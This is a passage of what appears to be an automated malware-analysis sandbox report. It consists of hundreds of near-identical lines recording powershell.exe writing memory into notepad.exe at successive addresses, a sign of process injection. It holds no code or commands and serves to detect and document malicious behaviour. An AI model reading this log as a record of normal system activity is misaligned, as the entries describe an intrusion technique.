              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430104Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430105Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430106Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430107Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430108Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430109Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743010AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743010BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743010CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743010DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743010EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743010FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430110Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430111Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430112Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430113Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430114Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430115Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430116Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430117Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430118Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430119Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743011AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743011BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743011CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743011DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743011EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743011FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430120Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430121Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430122Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430123Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430124Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430125Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430126Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430127Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430128Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430129Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743012AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743012BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743012CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743012DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743012EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743012FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430130Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430131Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430132Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430133Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430134Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430135Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430136Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430137Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430138Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430139Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743013AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743013BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743013CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743013DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743013EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743013FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430140Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430141Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430142Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430143Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430144Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430145Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430146Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430147Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430148Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430149Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743014AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743014BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743014CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743014DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743014EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743014FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430150Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430151Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430152Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430153Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430154Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430155Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430156Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430157Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430158Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430159Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743015AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743015BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743015CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743015DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743015EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743015FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430160Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430161Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430162Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430163Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430164Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430165Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430166Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430167Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430168Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430169Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743016AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743016BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743016CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743016DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743016EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743016FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430170Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430171Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430172Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430173Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430174Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430175Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430176Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430177Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430178Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430179Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743017AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743017BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743017CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743017DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743017EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743017FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430180Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430181Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430182Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430183Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430184Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430185Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430186Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430187Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430188Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430189Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743018AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743018BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743018CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743018DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743018EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743018FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430190Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430191Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430192Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430193Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430194Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430195Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430196Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430197Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430198Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430199Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743019AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743019BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743019CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743019DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743019EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743019FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301A9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301AAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301ABJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301ACJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301ADJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301AEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301AFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301B9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301BAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301BBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301BCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301BDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301BEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301BFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301C9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301CBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301CCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301CDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301CEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301CFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D5Jump to behavior
